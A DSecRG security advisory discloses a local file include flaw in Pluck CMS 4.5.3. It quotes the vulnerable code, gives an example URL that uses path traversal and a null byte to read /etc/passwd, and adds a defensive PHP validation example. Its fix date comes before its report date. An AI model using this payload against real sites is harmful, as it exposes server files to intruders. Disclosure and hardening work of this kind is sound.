[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3



Hello, bugtraq.

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039


Application: Pluck CMS
Versions Affected: 4.5.3
Vendor URL: http://www.pluck-cms.org/
Bug: Local File Include
Exploits: YES
Reported: 25.08.2008
Vendor Response: 30.08.2008
Solution: YES
Date of Public Advisory: 18.11.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Pluck CMS has a Local File Include vulnerability.



Details
*******

1. A Local File Include vulnerability was found in the script data/inc/lib/pcltar.lib.php

Successful exploitation requires that "register_globals" is enabled.

Code
----
#################################################

// With register_globals enabled, a request parameter named g_pcltar_lib_dir
// already populates this global, so the default below is skipped and the
// caller's value is kept.
if (!isset($g_pcltar_lib_dir))
    $g_pcltar_lib_dir = "lib";

...

$g_pcltar_extension = "php";

// The unvalidated value is concatenated straight into the include path.
if (!defined("PCLERROR_LIB"))
{
    include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
}
if (!defined("PCLTRACE_LIB"))
{
    include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
}

#################################################

Example:

http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00
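The root cause above is that, with register_globals on, a query parameter named g_pcltar_lib_dir pre-populates the global that the script otherwise defaults to "lib", and that value is concatenated into include() with no check at all. The following is an added example, not Pluck CMS code, showing how an include-path component can be constrained before use: the helper name resolve_lib_dir, the candidate inputs and the temporary directory layout are assumptions made so the script runs stand-alone.

```php
<?php
// Added example (not Pluck CMS code): validate an include-path component
// before it reaches include(), instead of trusting a global that
// register_globals lets the request populate.

// Hypothetical helper: accept only a plain directory name and confirm the
// resolved path stays inside the expected base directory.
function resolve_lib_dir(string $base, string $dir): ?string
{
    // Reject anything but a simple name: no slashes, no "..", no NUL bytes.
    // This runs before any filesystem call, so realpath() never sees a NUL.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $dir)) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $dir);
    if ($baseReal === false || $target === false) {
        return null;   // base missing, or the named directory does not exist
    }
    // Containment check: the resolved path must be the base or beneath it.
    if (strpos($target . DIRECTORY_SEPARATOR, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout for a stand-alone run: <tmp>/data/inc/lib/pclerror.lib.php
$tmp = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir("$tmp/data/inc/lib", 0700, true);
file_put_contents("$tmp/data/inc/lib/pclerror.lib.php",
                  "<?php define('PCLERROR_LIB', 1);\n");
$base = "$tmp/data/inc";

// Constructed candidates standing in for a request-supplied value:
// the legitimate default, a traversal with a trailing NUL (the shape of the
// advisory's example), a traversal that uses a legitimate prefix, and a
// well-formed name that simply does not exist under the base.
$candidates = [
    'lib',
    '../../../../etc/passwd' . "\0",
    'lib/../../..',
    'nonexistent',
];

foreach ($candidates as $candidate) {
    $dir = resolve_lib_dir($base, $candidate);
    if ($dir === null) {
        echo "rejected: " . addcslashes($candidate, "\0..\37") . "\n";
        continue;
    }
    // Hardened use: only a validated, contained path is ever concatenated.
    if (!defined('PCLERROR_LIB')) {
        include "$dir/pclerror.lib.php";
    }
    echo "included from: $dir (PCLERROR_LIB defined: "
        . (defined('PCLERROR_LIB') ? 'yes' : 'no') . ")\n";
}

// Remove the constructed layout again.
unlink("$tmp/data/inc/lib/pclerror.lib.php");
rmdir("$tmp/data/inc/lib");
rmdir("$tmp/data/inc");
rmdir("$tmp/data");
rmdir($tmp);
```

Run it with the php command-line binary: the first candidate is included and the other three are rejected before any filesystem function is called with them. The order of the checks matters: the name check comes before realpath(), because PHP 8 filesystem functions raise a ValueError on paths containing NUL bytes instead of silently truncating them as older versions did. Turning register_globals off (the directive was removed entirely in PHP 5.4) closes the injection route, but the validation keeps the include safe whenever the variable is set by any caller rather than by the script itself.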



Solution
********
The vendor fixed this flaw on 09.08.2008. The new version, Pluck CMS 4.6, can be downloaded here:


http://www.pluck-cms.org/downloads/click.php?id=8



About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)


